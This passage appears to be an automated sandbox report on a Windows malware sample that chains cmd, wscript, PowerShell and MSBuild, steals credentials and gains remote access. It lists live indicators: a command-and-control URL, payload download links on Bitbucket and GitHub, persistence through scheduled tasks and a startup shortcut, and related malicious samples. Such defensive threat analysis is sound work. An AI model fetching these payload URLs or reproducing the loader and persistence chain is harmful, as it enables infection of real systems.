                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformation
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Code function: 0_2_00007FF761F78964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF761F78964
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Code function: 0_2_00007FF761F72C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF761F72C54
                  Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 6.2.powershell.exe.1d3bba895c8.2.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 6.2.powershell.exe.1d3bba895c8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000008.00000002.4118790717.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000006.00000002.1823716932.000001D3BBA89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7256, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 6.2.powershell.exe.1d3bba895c8.2.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 6.2.powershell.exe.1d3bba895c8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000008.00000002.4118790717.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000006.00000002.1823716932.000001D3BBA89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7256, type: MEMORYSTR
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | 111 Scripting | Valid Accounts | 121 Windows Management Instrumentation | 111 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                  Credentials | Domains | Default Accounts | 12 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Obfuscated Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 11 Scheduled Task/Job | 211 Process Injection | 1 Software Packing | Security Account Manager | 127 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | 22 Command and Scripting Interpreter | 21 Registry Run Keys / Startup Folder | 11 Scheduled Task/Job | 1 Timestomp | NTDS | 111 Security Software Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | 11 Scheduled Task/Job | Network Logon Script | 21 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | 2 PowerShell | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 211 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Rundll32 | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
[Behavior graph. ID: 1583964; Sample: 3lhrJ4X.exe; Start date: 03/01/2025; Architecture: WINDOWS; Score: 100]
Process chain shown in the graph: 3lhrJ4X.exe → cmd.exe → wscript.exe → powershell.exe → powershell.exe → MSBuild.exe → schtasks.exe, attrib.exe and 12 other processes.

Source | Detection | Scanner | Label | Link
3lhrJ4X.exe | 8% | ReversingLabs

Source | Detection | Scanner | Label | Link
C:\Users\user\OneDrive\autoit3.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\common files.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\google.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\internet explorer.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\java.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\jdownloader.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\microsoft office.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\microsoft onedrive.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\microsoft.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\microsoft.net.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\mozilla maintenance service.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\msbuild.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\msecache.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\reference assemblies.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\windows defender.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\windows mail.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\windows media player.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\windows multimedia platform.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\windows nt.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\windows photo viewer.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\windows portable devices.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\windows sidebar.exe | 0% | ReversingLabs
C:\Users\user\OneDrive\windowspowershell.exe | 0% | ReversingLabs

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
http://87.120.126.5/VmCetSC7/page.php | 0% | Avira URL Cloud | safe
http://87.120.126.5/VmCetSC7/page.phpP | 0% | Avira URL Cloud | safe
http://87.120.126.5 | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-w.us-east-1.amazonaws.com | 52.216.138.83 | true | false | | high
bitbucket.org | 185.166.143.48 | true | false | | high
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
raw.githubusercontent.com | 185.199.111.133 | true | false | | high
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high
bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://bitbucket.org/fqwfwrqwe/werwfqwf/downloads/pbbcnnk.txt | false | | high
https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg | false | | high
https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612 | false | | high
http://87.120.126.5/VmCetSC7/page.php | true | Avira URL Cloud: safe | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
185.166.143.48 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
87.120.126.5 | unknown | Bulgaria | 25206 | UNACS-AS-BG8000BurgasBG | true
52.216.138.83 | s3-w.us-east-1.amazonaws.com | United States | 16509 | AMAZON-02US | false
185.199.111.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1583964
Start date and time: 2025-01-03 23:19:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 47
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 3lhrJ4X.exe
Detection: MAL
Classification: mal100.spre.troj.expl.evad.mine.winEXE@64/37@3/4
EGA Information:
• Successful, ratio: 40%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 179
• Number of non-executed functions: 29
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 199.232.214.172, 192.229.221.95, 40.69.42.241, 20.242.39.171, 13.107.246.45
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Execution Graph export aborted for target MSBuild.exe, PID 5440 because it is empty
• Execution Graph export aborted for target MSBuild.exe, PID 7696 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7840 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: 3lhrJ4X.exe
                                                                                                Time | Type | Description
                                                                                                17:19:57 | API Interceptor | 44x Sleep call for process: powershell.exe modified
                                                                                                17:20:11 | API Interceptor | 9997846x Sleep call for process: MSBuild.exe modified
                                                                                                22:20:57 | Task Scheduler | Run new task: Msbuild path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                                                                                                22:20:57 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Msbuild.lnk
                                                                                                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                185.166.143.48http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txtGet hashmaliciousUnknownBrowse
                                                                                                • bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt
                                                                                                87.120.126.53u8A2xjbBT.exeGet hashmaliciousLiteHTTP BotBrowse
                                                                                                • 87.120.126.5/VmCetSC7/page.php
                                                                                                185.199.111.133cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                raw.githubusercontent.comdGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.109.133
                                                                                                dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.110.133
                                                                                                Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                • 185.199.109.133
                                                                                                ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.111.133
                                                                                                over.ps1Get hashmaliciousVidarBrowse
                                                                                                • 185.199.109.133
                                                                                                Epsilon.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.111.133
                                                                                                eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                • 185.199.110.133
                                                                                                Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                • 185.199.108.133
                                                                                                Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                • 185.199.108.133
                                                                                                Supplier.batGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.110.133
                                                                                                bitbucket.org1111.htaGet hashmaliciousUnknownBrowse
                                                                                                • 185.166.143.50
                                                                                                Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                                                                                • 185.166.143.49
                                                                                                Epsilon.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.166.143.48
                                                                                                j6ks0Fxu6t.exeGet hashmaliciousLummaCBrowse
                                                                                                • 185.166.143.50
                                                                                                fnCae9FQhg.exeGet hashmaliciousLummaCBrowse
                                                                                                • 185.166.143.48
                                                                                                SFtDA07UDr.exeGet hashmaliciousLummaCBrowse
                                                                                                • 185.166.143.48
                                                                                                Gq48hjKhZf.exeGet hashmaliciousLodaRATBrowse
                                                                                                • 185.166.143.49
                                                                                                Gq48hjKhZf.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.166.143.48
                                                                                                2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                                                                                • 185.166.143.50
                                                                                                tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                                                • 185.166.143.48
                                                                                                s3-w.us-east-1.amazonaws.comFaxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                                                                                • 52.217.199.81
                                                                                                DIS_37745672.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                • 16.182.32.57
                                                                                                PersonnelPolicies.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                • 16.182.35.201
                                                                                                https://kn0wbe4.compromisedblog.com/XZHJISTcycW1tZkROWG92Y2ZEc21laS80dzNTR2N0eEsvTDFRWGFNODdGaGtjNGo5VzRyMFRUQmFLM0grcGxUbnBSTVFhMEg2Smd3UkovaXVjaUpIcG1hZG5CQnh5aFlZTXNqNldTdm84cE5CMUtld0dCZzN4ZUFRK2lvL1FWTG92NUJsMnJ3OHFGckdTNFhnMkFUTFZFZTdKRnVJaTRuRGFKdXVyeUdCVytuQzdnMEV1ZExSMnlwWi9RPT0tLTdnZjhxQVZPbUdTdFZXVUEtLXA0bHNCNGxmeTdrdmlkWWRVcmRXRWc9PQ==?cid=2310423310Get hashmaliciousKnowBe4Browse
                                                                                                • 54.231.199.241
                                                                                                j6ks0Fxu6t.exeGet hashmaliciousLummaCBrowse
                                                                                                • 52.216.216.113
                                                                                                fnCae9FQhg.exeGet hashmaliciousLummaCBrowse
                                                                                                • 16.182.108.137
                                                                                                SFtDA07UDr.exeGet hashmaliciousLummaCBrowse
                                                                                                • 16.182.108.137
                                                                                                Gq48hjKhZf.exeGet hashmaliciousLodaRATBrowse
                                                                                                • 3.5.8.193
                                                                                                2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                                                                                • 52.217.14.36
                                                                                                tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                                                • 16.15.177.52
                                                                                                bg.microsoft.map.fastly.net2Mi3lKoJfj.exeGet hashmaliciousQuasarBrowse
                                                                                                • 199.232.210.172
                                                                                                Reparto Trabajo TP4.xlsmGet hashmaliciousUnknownBrowse
                                                                                                • 199.232.210.172
                                                                                                file.exeGet hashmaliciousDcRat, JasonRATBrowse
                                                                                                • 199.232.214.172
                                                                                                iviewers.dllGet hashmaliciousDcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                                                • 199.232.214.172
                                                                                                wrcaf.ps1Get hashmaliciousDcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                                                • 199.232.210.172
                                                                                                iubn.ps1Get hashmaliciousDcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                                                • 199.232.210.172
                                                                                                rwvg1.exeGet hashmaliciousDcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                                                • 199.232.210.172
                                                                                                ersyb.exeGet hashmaliciousDcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                                                • 199.232.214.172
                                                                                                Hornswoggle.exeGet hashmaliciousGuLoaderBrowse
                                                                                                • 199.232.214.172
                                                                                                8n26gvrXUM.exeGet hashmaliciousUnknownBrowse
                                                                                                • 199.232.214.172
                                                                                                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                FASTLYUShttps://covid19.protected-forms.com/XQTNkY0hwMkttOEdiZmZ0V2RRTHpDdDNqUTROanhES0NBYmdFOG1KTGRSTUtrK3VMMzlEN1JKVVFXNUxaNGJOQmd1YzQ3ajJMeVdZUDU3TytRbGtIaFhWRkxnT0lkeTZhdy9xWEhjeFBoRXRTb2hxdjlVbi9iSk1qZytLQ0JxRjd4UmpOS3VUQ2lpOEZneTRoVmpzY2dyekR1WlhYOWVteVcrUXg0a2Y2aEU2ZEZwMVNId3R0U01RK3N3PT0tLVR0bDl1WEFUelg3K2VzTystLUxaMkFrZnU0UmJXRkR3aE5NRE9BOEE9PQ==?cid=2351432832Get hashmaliciousKnowBe4Browse
                                                                                                • 199.232.196.193
                                                                                                https://rfqdocu.construction-org.com/Q5kL4/Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 151.101.130.137
                                                                                                nv8401986_110422.exeGet hashmaliciousQjwmonkeyBrowse
                                                                                                • 151.101.194.137
                                                                                                https://t.co/jNNzVU90SAGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 151.101.2.137
                                                                                                http://www.klim.comGet hashmaliciousUnknownBrowse
                                                                                                • 151.101.2.133
                                                                                                ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                • 185.199.108.133
                                                                                                http://4.nscqn.dashboradcortx.xyz/4hbVgI3060FFjU163rczgakrldw288HJUBSXEIQRWLNTA425583MYLP8076x12Get hashmaliciousUnknownBrowse
                                                                                                • 151.101.2.132
                                                                                                mierda.txt.pyGet hashmaliciousUnknownBrowse
                                                                                                • 151.101.67.6
                                                                                                http://hotelyetipokhara.comGet hashmaliciousUnknownBrowse
                                                                                                • 151.101.67.1
                                                                                                https://realpaperworks.com/wp-content/red/UhPIYaGet hashmaliciousUnknownBrowse
                                                                                                • 151.101.194.137
                                                                                                UNACS-AS-BG8000BurgasBGXClient.exeGet hashmaliciousXWormBrowse
                                                                                                • 87.120.125.47
                                                                                                file.exeGet hashmaliciousDcRat, JasonRATBrowse
                                                                                                • 87.120.113.91
                                                                                                009274965.lnkGet hashmaliciousDarkVision RatBrowse
                                                                                                • 87.120.113.91
                                                                                                hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                • 87.120.115.216
                                                                                                rebirth.arm4t.elfGet hashmaliciousGafgytBrowse
                                                                                                • 87.120.113.63
                                                                                                rebirth.spc.elfGet hashmaliciousGafgytBrowse
                                                                                                • 87.120.113.63
                                                                                                rebirth.sh4.elfGet hashmaliciousGafgytBrowse
                                                                                                • 87.120.113.63
                                                                                                rebirth.arm5.elfGet hashmaliciousGafgytBrowse
                                                                                                • 87.120.113.63
                                                                                                rebirth.x86.elfGet hashmaliciousGafgytBrowse
                                                                                                • 87.120.113.63
                                                                                                rebirth.ppc.elfGet hashmaliciousGafgytBrowse
                                                                                                • 87.120.113.63
                                                                                                AMAZON-02UShttps://track2.mccarthysearch.com/9155296/c?p=UJEwZLRSuPVlnD1ICTWZusB5H46ZFxhQFeZmgv_N89FzkqdhuHSGoPyB5qZfahmny00oVnRJ_XGR4M89Ovy-j3JZN_nz1Nb-BfHfDXVFwrd4A8njKtxWHgVV9KpuZ3ad6Xn31h13Ok4dSqgAUkhmVH1KUMKOlrKi5AYGmafMXkrBRxU_B4vy7NXVbEVJ970TwM25LbuS_B0xuuC5g8ehQDyYNyEV1WCghuhx_ZKmrGeOOXDf8HkQ-KOwv_tecp8TMdskXzay5lvoS31gB-nWxsjPaZ8f84KWvabQB4eF73ffpyNcTpJues_4IHHPjEKJ9ritMRTaHbFdQGNT_n13X_E7no0nMmaegQjwo4kKGu6oR02iG2c_6ucy3I6d8vsNl324Pjhx3M20dDmfZAju1roW9lGyO1LfgEnp1iSAFpx4kA7frEmKGzJYNX_cZrwVBoH8vvIYauXGnXBrZacRhuZGGbOjW2HHr9KF-0q7xjdgG2hxjWZ2H9zjubJGDnUjHRfiIr_-0bem1pLFqziEmy0450LGuXV23cQ6GD8yuK9tuRwMIF0sbkhVqONC0e6TsXlkUuTRAVWBbLlRPcygJ-CbukwvFtAxobVQ8-PpIuGj97DYFnmbfbJrrZDtH57TpdP4AxtW5k74BKSXvb1B6JX0p7Oyr1kXxLs_OrNPdAdrf8gXR35D9W7WeQ2zhPEqP0Mv5sJx4DlYh6Y4FqgPfCRFcDcL7Cy3HSlJ0XYfv-ae4o-hdX_0rJPqEG_-Bn2yj60YPDYpE8KDIgC_ZMwlNLdK4pAK6vSt4NWDncuV5y7QDqt97ribjd4U3AOvQTKW9r_eMky9-IC9hkSPrg2S0ZBgA9ITW3AQ3v-lq94cAwt1v1RLaFgsy67l_7lni1gYsZaQdOsFJsDpCFYaZsTMcVz2QAnQ_2UidhzlUekPl5xh9LNe9o77rO1FolZslooaXxCf2U2RZmvUA6NCNiGZ8KSsoUYTnqAHenvBJVJwMWd66yD2O60rC3Ic2qOQ1KOF9AB6-iFTvQFxtSTjS2hFwi7N97LeQtVYKhdzZuq2SasgJg0JPnZiFv_FSbgmiodqx9rz_lWIqWQNoQVht-oO2BfFxSF_aedAmm2MuQAL7z8UjBf_deiKwQyfKOyA6ZkAJ14F9xwhNm9F7B4PBgDtocqJQBjw5Cf1jCBSAs3nSYP2_nzofJuQSXd-YD9PIzkkmJw7Nqux7IgJ6p1z2Hsf6i3zShVdZY3g2mmA1xR1FV1LoSYwcRBqZt3pv0UDjuqCEoiqKDuyT0rkhqTRLo29uuM588Lna16PFSgSLoLUhnJ2rx8NLQQc5TqrsGjlN-ulCwTEyA0C9E